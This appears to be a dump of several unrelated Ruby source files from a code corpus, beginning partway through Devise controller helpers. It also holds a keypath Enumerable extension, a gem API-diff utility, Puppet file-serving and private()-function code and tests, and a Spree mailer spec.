# Helper for use after calling send_*_instructions methods on a resource.
# If we are in paranoid mode, we always act as if the resource was valid
# and instructions were sent.
def successfully_sent?(resource)
notice = if Devise.paranoid
resource.errors.clear
:send_paranoid_instructions
elsif resource.errors.empty?
:send_instructions
end
if notice
set_flash_message :notice, notice if is_flashing_format?
true
end
end
# Sets the flash message with :key, using I18n. By default you are able
# to setup your messages using specific resource scope, and if no message is
# found we look to the default scope. Set the "now" options key to a true
# value to populate the flash.now hash in lieu of the default flash hash (so
# the flash message will be available to the current action instead of the
# next action).
# Example (i18n locale file):
#
# en:
# devise:
# passwords:
# #default_scope_messages - only if resource_scope is not found
# user:
# #resource_scope_messages
#
# Please refer to README or en.yml locale file to check what messages are
# available.
def set_flash_message(key, kind, options = {})
message = find_message(kind, options)
if options[:now]
flash.now[key] = message if message.present?
else
flash[key] = message if message.present?
end
end
# Sets minimum password length to show to user
def set_minimum_password_length
if devise_mapping.validatable?
@minimum_password_length = resource_class.password_length.min
end
end
def devise_i18n_options(options)
options
end
# Get the message for the given kind, looked up within the resolved translation scope
def find_message(kind, options = {})
options[:scope] ||= translation_scope
options[:default] = Array(options[:default]).unshift(kind.to_sym)
options[:resource_name] = resource_name
options = devise_i18n_options(options)
I18n.t("#{options[:resource_name]}.#{kind}", options)
end
# Controllers inheriting DeviseController are advised to override this
# method so that other controllers inheriting from them would use
# existing translations.
def translation_scope
"devise.#{controller_name}"
end
def clean_up_passwords(object)
object.clean_up_passwords if object.respond_to?(:clean_up_passwords)
end
def respond_with_navigational(*args, &block)
respond_with(*args) do |format|
format.any(*navigational_formats, &block)
end
end
def resource_params
params.fetch(resource_name, {})
end
ActiveSupport.run_load_hooks(:devise_controller, self)
end
| 30.15 | 113 | 0.729187 |
62709633d2e891e5b625cd24b6841d5e671f9005 | 2,605 | module Enumerable
# see: http://stackoverflow.com/a/7139631/83386
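# Hedged example of the dotted-path lookup this implements (data is illustrative):
#
#   { 'a' => { :b => [10, 20] } }.value_at_keypath('a.b.1') # => 20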
def value_at_keypath(keypath)
keypath = keypath.to_s if keypath.is_a?(KeyPath::Path)
parts = keypath.split '.', 2
# if it's an array, call the index
if self[parts[0].to_i]
match = self[parts[0].to_i]
else
match = self[parts[0]] || self[parts[0].to_sym]
end
if !parts[1] || match.nil?
return match
else
return match.value_at_keypath(parts[1])
end
end
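# Hedged sketch of the nesting behaviour of set_keypath (assumes the KeyPath string
# extensions such as String#to_keypath and #is_number? are loaded; the exact key
# classes depend on what KeyPath::Path#to_a yields):
#
#   {}.set_keypath('a', 1)    # => { a: 1 }  -- single segments are symbolized
#   {}.set_keypath('a.b', 1)  # builds a fresh nested hash under 'a' holding b => 1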
def set_keypath(keypath, value)
# handle both string and KeyPath::Path forms
keypath = keypath.to_keypath if keypath.is_a?(String)
keypath_parts = keypath.to_a
# Return self if path empty
return self if keypath_parts.empty?
key = keypath_parts.shift
# Just assign value to self when it's a direct path
# Remember, this is after calling keypath_parts#shift
if keypath_parts.length == 0
key = key.is_number? ? Integer(key) : key.to_sym
self[key] = value
return self
end
# keypath_parts.length > 0
# Remember, this is after calling keypath_parts#shift
collection = if key.is_number?
Array.new
else
Hash.new
end
# Remember, this is after calling keypath_parts#shift
collection.set_keypath(keypath_parts.join('.'), value)
# merge the new collection into self
self[key] = collection
end
def delete_at_keypath_with_wildcard(keypath)
return delete_at_keypath(keypath, true)
end
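# Hedged example of the wildcard form (data illustrative): a '*' segment fans the
# delete out across every value of a hash, so
#
#   { a: { x: 1 }, b: { x: 2 } }.delete_at_keypath_with_wildcard('*.x')
#
# removes :x from both nested hashes and returns the deleted values.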
def delete_at_keypath(keypath, wild_card_allowed = false)
keypath = keypath.to_s if keypath.is_a?(KeyPath::Path)
parts = keypath.split '.', 2
return nil if parts.empty?
index = Integer parts[0] rescue nil
unless parts[1]
if index
return self.delete_at index
else
return (self.delete parts[0]) || (self.delete parts[0].to_sym)
end
end
# if it's an array, call the index
if self.is_a? Array
match = index ? self[index] : nil
elsif wild_card_allowed && parts[0] == '*'
raise "wildcard should only be applied to hash keys; (for array, please skip the key)" unless self.instance_of?(Hash)
match = self.values
else
match = self[parts[0]] || self[parts[0].to_sym]
end
return nil unless match.instance_of?(Hash) || match.instance_of?(Array)
if match.instance_of?(Array) and (false if Integer((parts[1].split '.',2).first) rescue true)
return match.collect {|m| m.delete_at_keypath(parts[1], wild_card_allowed)}
end
return match.delete_at_keypath(parts[1], wild_card_allowed)
end
end
| 27.712766 | 123 | 0.663724 |
4af4b66dd87ada6c4485c8b0c02739f2d644accf | 1,432 | class VersionDiffer
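# Maintenance helper around `yard diff`: it compares the public API of released
# watir-webdriver gems and writes per-version summaries. A hedged usage sketch
# (the file names are illustrative, not prescribed by this class):
#
#   VersionDiffer.new.update('CHANGES.md')    # prepend the latest release's API diff
#   VersionDiffer.new.generate('API_DIFF.md') # append a diff section per released version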
def print_latest(io = $stdout)
io.puts diff(last_version, ".")
end
def update(path)
old = File.read(path)
File.open(path, "w") do |file|
print_latest(file)
file << old
end
end
def generate(path)
versions = released_versions
versions.unshift "."
versions.each_cons(2) do |new_version, old_version|
File.open(path, "a") do |file|
file << diff(old_version, new_version)
end
end
end
private
def last_version
released_versions.first
end
def released_versions
require 'open-uri'
require 'multi_json'
versions = MultiJson.decode(open("https://rubygems.org/api/v1/versions/watir-webdriver.json").read)
versions.map! { |e| e.fetch('number')}
end
def diff(old_version, new_version)
puts "diffing #{old_version} -> #{new_version}"
left = "watir-webdriver-#{old_version}.gem"
right = new_version == "." ? new_version : "watir-webdriver-#{new_version}.gem"
str = StringIO.new
str.puts "#{new_version}"
str.puts "=" * new_version.length
str.puts
# requires YARD > 0.8.2.1 (i.e. next release at the time of writing)
content = `yard diff --all --query '!@private && @api.text != "private" && object.visibility == :public' #{left} #{right} 2>&1`
str.puts content.split("\n").map { |line| line.empty? ? line : " #{line}" }
str.puts "\n\n"
str.string
end
end | 24.271186 | 131 | 0.630587 |
4aafcb9fd3caafddeb5004628d9ed655a99808e3 | 1,261 | require 'uri'
require 'puppet/file_serving'
require 'puppet/util'
# This module is used to pick the appropriate terminus
# in file-serving indirections. This is necessary because
# the terminus varies based on the URI asked for.
module Puppet::FileServing::IndirectionHooks
PROTOCOL_MAP = {"puppet" => :rest, "file" => :file}
# Pick an appropriate terminus based on the protocol.
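# Roughly (a hedged summary, not exhaustive): absolute paths and 'file' URIs map to
# the :file terminus, 'puppet' URIs with a server name (or when we are not running
# as 'puppet'/'apply') map to :rest, and anything else falls through to :file_server.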
def select_terminus(request)
# We rely on the request's parsing of the URI.
# Short-circuit to :file if it's a fully-qualified path or specifies a 'file' protocol.
return PROTOCOL_MAP["file"] if Puppet::Util.absolute_path?(request.key)
return PROTOCOL_MAP["file"] if request.protocol == "file"
# We're heading over the wire the protocol is 'puppet' and we've got a server name or we're not named 'apply' or 'puppet'
if request.protocol == "puppet" and (request.server or !["puppet","apply"].include?(Puppet.settings[:name]))
return PROTOCOL_MAP["puppet"]
end
if request.protocol and PROTOCOL_MAP[request.protocol].nil?
raise(ArgumentError, "URI protocol '#{request.protocol}' is not currently supported for file serving")
end
# If we're still here, we're using the file_server or modules.
:file_server
end
end
| 39.40625 | 125 | 0.720856 |
7a1ffde093756057f0f811c5128f1a678cee457a | 41 | Thepivotstudy::Engine.routes.draw do
end
| 13.666667 | 36 | 0.829268 |
bba57dc94644d24ced57ce82f0f4cb9f22e9dc4f | 2,269 | #! /usr/bin/env ruby -S rspec
require 'spec_helper'
describe Puppet::Parser::Functions.function(:private) do
let(:scope) { PuppetlabsSpec::PuppetInternals.scope }
subject do
function_name = Puppet::Parser::Functions.function(:private)
scope.method(function_name)
end
it 'should issue a warning' do
scope.expects(:warning).with("private() DEPRECATED: This function will cease to function on Puppet 4; please use assert_private() before upgrading to puppet 4 for backwards-compatibility, or migrate to the new parser's typing system.")
subject.call []
end
context "when called from inside module" do
it "should not fail" do
scope.expects(:lookupvar).with('module_name').returns('foo')
scope.expects(:lookupvar).with('caller_module_name').returns('foo')
expect {
subject.call []
}.not_to raise_error
end
end
context "with an explicit failure message" do
it "prints the failure message on error" do
scope.expects(:lookupvar).with('module_name').returns('foo')
scope.expects(:lookupvar).with('caller_module_name').returns('bar')
expect {
subject.call ['failure message!']
}.to raise_error Puppet::ParseError, /failure message!/
end
end
context "when called from private class" do
it "should fail with a class error message" do
scope.expects(:lookupvar).with('module_name').returns('foo')
scope.expects(:lookupvar).with('caller_module_name').returns('bar')
scope.source.expects(:name).returns('foo::baz')
scope.source.expects(:type).returns('hostclass')
expect {
subject.call []
}.to raise_error Puppet::ParseError, /Class foo::baz is private/
end
end
context "when called from private definition" do
it "should fail with a class error message" do
scope.expects(:lookupvar).with('module_name').returns('foo')
scope.expects(:lookupvar).with('caller_module_name').returns('bar')
scope.source.expects(:name).returns('foo::baz')
scope.source.expects(:type).returns('definition')
expect {
subject.call []
}.to raise_error Puppet::ParseError, /Definition foo::baz is private/
end
end
end
| 37.196721 | 240 | 0.669899 |
f8ebefb6067eee2e0fbf6c2eaf6b5406453e7ca7 | 71 | # frozen_string_literal: true
module ApiGuard
VERSION = '0.4.2'
end
| 11.833333 | 29 | 0.732394 |
1a4f56420520e6f8d4c5514172bcd0d10ce8d027 | 124 | class Tag < ApplicationRecord
has_many :tag_relates, dependent: :destroy
has_many :data_sets, through: :tag_relates
end
| 24.8 | 44 | 0.790323 |
bf5745e6ca3016f4205b3cbb97b45e2bad7b0f0c | 32 | require "rps"
require "stringio" | 16 | 18 | 0.78125 |
26e21adfc385607076321c8f0828bbbbb9e592b7 | 1,856 | require 'spec_helper'
EMAILS = {
welcome_email: "successfully registered",
rejected_email: "is rejected",
verified_email: "successfully verified"
}
EMAILS.each do |key, value|
RSpec.shared_examples key do
it "has #{key} specific text in body" do
expect(body).to include(value)
end
it "has user's email in body" do
expect(body).to include("Hi")
expect(body).to include(user.email)
end
end
end
RSpec.shared_examples "verification mailer email" do |email_name|
it 'is sent from current store email address' do
expect(email.from).to eq([Spree::Store.current.mail_from_address])
end
it 'is sent to users email address' do
expect(email.to).to eq([user.email])
end
it 'subject contains store name' do
expect(email.subject).to include Spree::Store.current.name
end
it "subject contains #{email_name} specific text" do
expect(email.subject).to include Spree.t("verification_mailer.#{email_name}.subject")
end
context "text part of #{email_name}" do
include_examples email_name do
let(:body) { email.text_part.body.to_s }
end
end
context "html part of #{email_name}" do
include_examples email_name do
let(:body) { email.html_part.body.to_s }
end
end
end
describe Spree::VerificationMailer, type: :mailer do
before { create(:store) }
let(:user) { create(:user) }
EMAILS.each do |key, value|
context key.to_s.humanize do
let!(:email) { Spree::VerificationMailer.with(user: user).send(key) }
it_behaves_like "verification mailer email", key
end
end
context 'with preference :send_core_emails set to false' do
it 'sends no email' do
Spree::Config.set(:send_core_emails, false)
message = Spree::VerificationMailer.with(user: user).welcome_email
expect(message.body).to be_blank
end
end
end
| 26.514286 | 89 | 0.696659 |